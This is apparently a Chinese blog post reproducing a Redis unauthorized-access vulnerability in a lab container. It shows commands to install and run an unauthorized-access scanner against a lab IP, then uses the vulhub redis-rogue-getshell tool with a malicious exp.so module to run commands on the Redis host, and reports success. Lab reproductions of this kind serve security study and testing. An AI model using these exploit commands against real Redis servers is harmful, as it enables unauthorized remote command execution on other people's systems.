Redis未授权访问漏洞复现

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

先启动容器

Redis 未设置密码,客户端工具可以直接链接

https://github.com/xk11z/unauthorized_com

这里上一个自动检测未授权漏洞的工具,中间挺多坑的,作者提供的安装步骤有问题,修改了一下

复制代码
git clone https://github.com/xk11z/unauthorized_com.git 

cd unauthorized_com

apt-get install python3-pip  

pip install -r requirements.txt 

python3 unauthorized_com.py

这里还是不能运行,需要修改几个文件

vim dic.py

这里要导入redis,可能需要下载

这里修改了一下检测代码

python3 unauthorized_com.py -i 192.168.142.151|grep redis

容器的作者还提供了一个方法

git clone https://github.com/vulhub/redis-rogue-getshell

编译

python3 redis-master.py -r 192.168.142.151 -p 6379 -L 192.168.142.151 -P 8888 -f RedisModulesSDK/exp.so -c "id"

可以看到,命令执行成功

相关推荐
白露与泡影36 分钟前
Redis 缓存实战:雪崩、穿透、击穿一次讲透
数据库·redis·缓存
Steadfast_GG1 小时前
Redis典型应用 - 缓存,缓存更新策略,内存淘汰策略,缓存预热,缓存穿透,缓存雪崩,缓存击穿
redis·缓存穿透·缓存击穿·缓存雪崩·缓存预热·缓存更新策略·内存淘汰策略
赵渝强老师2 小时前
【赵渝强老师】使用Oracle可传输的表空间迁移数据
数据库·oracle
IpdataCloud3 小时前
跨区服玩家延迟高怎么办?用IP离线库自动分配到最近服务器
数据库·tcp/ip·github·php·ip
wuqingshun3141594 小时前
MYSQL默认的事务隔离级别是什么?为什么选择这个级别?
数据库·mysql
空中湖4 小时前
电池简史(五):极限之梦与终章——锂硫、锂空气、量子电池,以及你该知道的电池投资与生活指南
数据库·程序人生
蓝胖子酱5 小时前
在 Electron 中用 electron-store 实现加密存储与自定义格式文件
前端·javascript·数据库
snow@li6 小时前
Redis:数据库语法速查表 / 全景梳理
数据库·redis·缓存
Devlive 开源社区6 小时前
Nebula 1.6.0 发布:跨区域桶自动路由、秒传、文本/PDF 预览一次到位
数据库·sql
这个DBA有点耶7 小时前
导个数据中文全变问号?字符集这事儿真没那么简单
数据库·mysql·代码规范